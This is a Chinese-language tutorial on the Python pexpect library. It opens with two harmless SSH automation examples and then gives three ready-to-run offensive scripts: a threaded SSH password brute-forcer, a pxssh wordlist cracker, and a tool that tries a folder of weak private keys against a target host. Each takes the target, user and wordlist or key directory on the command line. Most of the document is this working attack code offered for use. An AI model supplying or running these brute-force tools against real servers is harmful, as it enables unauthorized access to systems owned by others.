Pexpect是一个纯Python模块,用于生成子应用程序;控制他们;并对输出中的预期模式作出响应。Pexpect的工作原理类似于Don Libes的Expect。Pexpect允许脚本生成一个子应用程序,并像键入命令一样控制它。Pexpect可用于自动化交互应用程序,如ssh、ftp、passwd、telnet等。它可用于自动化安装脚本,以在不同服务器上复制软件包安装。它可以用于自动化软件测试。
pexpect与SSH交互
#coding=utf-8
import pexpect
from threading import *
def SSHConnect(Host,User,Password,Port):
PROMPT = ["# ",">>> ","> ","\$ "]
ssh_newkey = 'Are you sure you want to continue connecting'
connStr = 'ssh ' + User + '@' + Host + ' -p ' + Port
try:
# 为ssh命令生成一个spawn类的对象
child = pexpect.spawn(connStr,timeout=1)
# 期望有ssh_newkey字符、提示输入密码的字符出现,否则超时
ret = child.expect([pexpect.TIMEOUT,ssh_newkey,'[P|p]assword: '])
if ret == 0:
return 0
if ret == 1:
# 发送yes回应ssh_newkey并期望提示输入密码的字符出现
child.sendline('yes')
ret = child.expect([pexpect.TIMEOUT,ssh_newkey,'[P|p]assword: '])
if ret == 0:
return 0
# 发送密码
child.sendline(Password)
child.expect(PROMPT)
return 1
except Exception:
pass
return 0
child = SSHConnect("192.168.1.20","root","123","22")
print(child)
pexpect登录执行命令
#-*- coding:UTF-8 -*-
import pexpect
def ssh(user,host,password,port,command):
child = pexpect.spawn('ssh -l %s %s -p %s %s' %(user,host,port,command))
# 0 : 连接超时
# 1 :ssh有时候提示你是否确认连接
# 2 :提示输入密码
# 3 :匹配到#号,表示命令已经执行完毕
ret = child.expect([pexpect.TIMEOUT, 'Are you sure you want to continue connecting','[Pp]assword:',r"([^-]>|#)"])
if ret == 0: # 连接超时
return 0
elif ret == 1: # SSH提示你是否确认连接
child.sendline ('yes') # 我们输入yes
child.expect ('password: ')# 输入yes后应该提示输入密码,我们再次期待 password
ret = child.expect([pexpect.TIMEOUT, 'password: '])
if ret == 0: # 连接超时
return 0
ret = child.sendline(password)
if ret == 5:
child.expect(pexpect.EOF)
return child.before
return 0
if __name__ =='__main__':
try:
host='192.168.1.20'
user="root"
password = '1233'
command="ifconfig"
child = ssh(user,host,password,"22",command)
print(child)
except Exception as e:
print (e)
pexpect暴力破解SSH
#coding=utf-8
import pexpect
import os,sys
import threading
from optparse import OptionParser
def SSHConnect(Host,User,Password,Port):
PROMPT = ["# ",">>> ","> ","\$ "]
ssh_newkey = 'Are you sure you want to continue connecting'
connStr = 'ssh ' + User + '@' + Host + ' -p ' + Port
try:
# 为ssh命令生成一个spawn类的对象
child = pexpect.spawn(connStr , timeout=1)
# 查询是否存在 ssh_newkey 里面的字符串、提示输入密码的字符出现,否则超时
ret = child.expect([pexpect.TIMEOUT,ssh_newkey,'[P|p]assword: '])
if ret == 0:
return 0
if ret == 1:
# 发送yes回应ssh_newkey并等待,提示输入密码的字符出现
child.sendline('yes')
ret = child.expect([pexpect.TIMEOUT,ssh_newkey,'[P|p]assword: '])
if ret == 0:
return 0
# 发送密码
child.sendline(Password)
child.expect(PROMPT)
return 1
except Exception:
pass
return 0
def ThreadBlast(Host,User,Password,Port,semaphore):
# 加锁
semaphore.acquire()
RetCode = SSHConnect(Host,User,Password,Port)
if RetCode == 1:
print("[+] --> 主机: {} 状态码: {} -------> 密码: {}".format(Host,RetCode,Password))
else:
# 释放锁
print("[-] --> 主机: {} 状态码: {}".format(Host,RetCode))
semaphore.release()
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("-H","--host",dest="host",help="set host 192.168.1.1")
parser.add_option("-u","--user",dest="user",help="set user root")
parser.add_option("-p","--port",dest="port",help="set port 22")
parser.add_option("-f","--file",dest="file",help="set file wordlist.log")
(options,args) = parser.parse_args()
if options.host and options.user and options.port and options.file:
# 设置线程锁,每次执行5个线程
semaphore = threading.Semaphore(5)
fp = open(options.file,"r")
PassList = fp.readlines()
for item in PassList:
t = threading.Thread(target=ThreadBlast,args=(options.host,options.user,item,options.port,semaphore))
t.start()
else:
parser.print_help()
pxssh暴力破解SSH
# -*- coding: utf-8 -*-
import optparse
from pexpect import pxssh
import time
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0
def connect(host, user, password, release):
global Found
global Fails
try:
s = pxssh.pxssh()
s.login(host, user, password)
print("[+] Password Found " + password)
Found = True
except Exception as e:
if "read_nonblocking" in str(e):
Fails += 1
time.sleep(5)
connect(host, user, password, False)
elif "synchronize with original prompt" in str(e):
time.sleep(1)
connect(host, user, password, False)
finally:
if release:
connection_lock.release()
def main():
parser = optparse.OptionParser("usage%prog" + "-H <target host> -u <user> -F <password list>")
parser.add_option("-H", dest="tgtHost", type="string", help="specify target host")
parser.add_option("-u", dest="user", type="string", help="specify the user")
parser.add_option("-F", dest="passwordFile", type="string", help="specify password file")
options, args = parser.parse_args()
host = options.tgtHost
passwdFile = options.passwordFile
user = options.user
if host is None or passwdFile is None or user is None:
print(parser.usage)
exit(0)
fn = open(passwdFile, "r")
for line in fn.readlines():
if Found:
# 如果发现了密码就退出
print("[*] Exiting: Password Found")
exit(0)
if Fails > 5:
print("[!] Too Many Socket Timeouts")
exit(0)
connection_lock.acquire()
password = line.strip("\r").strip("\n")
print("[-] Testing: " + str(password))
t = Thread(target=connect, args=(host, user, password, True))
t.start()
if __name__ == "__main__":
main()
利用SSH中的弱密钥
#!/usr/bin/python
#coding=utf-8
import pexpect
import optparse
import os
from threading import *
maxConnections = 5
#定义一个有界信号量BoundedSemaphore,在调用release()函数时会检查增加的计数是否超过上限
connection_lock = BoundedSemaphore(value=maxConnections)
Stop = False
Fails = 0
def connect(host,user,keyfile,release):
global Stop
global Fails
try:
perm_denied = 'Permission denied'
ssh_newkey = 'Are you sure you want to continue'
conn_closed = 'Connection closed by remote host'
opt = ' -o PasswordAuthentication=no'
connStr = 'ssh ' + user + '@' + host + ' -i ' + keyfile + opt
child = pexpect.spawn(connStr)
ret = child.expect([pexpect.TIMEOUT,perm_denied,ssh_newkey,conn_closed,'$','#', ])
#匹配到ssh_newkey
if ret == 2:
print '[-] Adding Host to ~/.ssh/known_hosts'
child.sendline('yes')
connect(user, host, keyfile, False)
#匹配到conn_closed
elif ret == 3:
print '[-] Connection Closed By Remote Host'
Fails += 1
#匹配到提示符'$','#',
elif ret > 3:
print '[+] Success. ' + str(keyfile)
Stop = True
finally:
if release:
#释放锁
connection_lock.release()
def main():
parser = optparse.OptionParser('[*] Usage : ./sshBrute.py -H <target host> -u <username> -d <directory>')
parser.add_option('-H',dest='host',type='string',help='specify target host')
parser.add_option('-u',dest='username',type='string',help='target username')
parser.add_option('-d',dest='passDir',type='string',help='specify directory with keys')
(options,args) = parser.parse_args()
if (options.host == None) | (options.username == None) | (options.passDir == None):
print parser.usage
exit(0)
host = options.host
username = options.username
passDir = options.passDir
#os.listdir()返回指定目录下的所有文件和目录名
for filename in os.listdir(passDir):
if Stop:
print '[*] Exiting: Key Found.'
exit(0)
if Fails > 5:
print '[!] Exiting: Too Many Connections Closed By Remote Host.'
print '[!] Adjust number of simultaneous threads.'
exit(0)
#加锁
connection_lock.acquire()
#连接目录与文件名或目录
fullpath = os.path.join(passDir,filename)
print '[-] Testing keyfile ' + str(fullpath)
t = Thread(target=connect,args=(username,host,fullpath,True))
child = t.start()
if __name__ =='__main__':
main()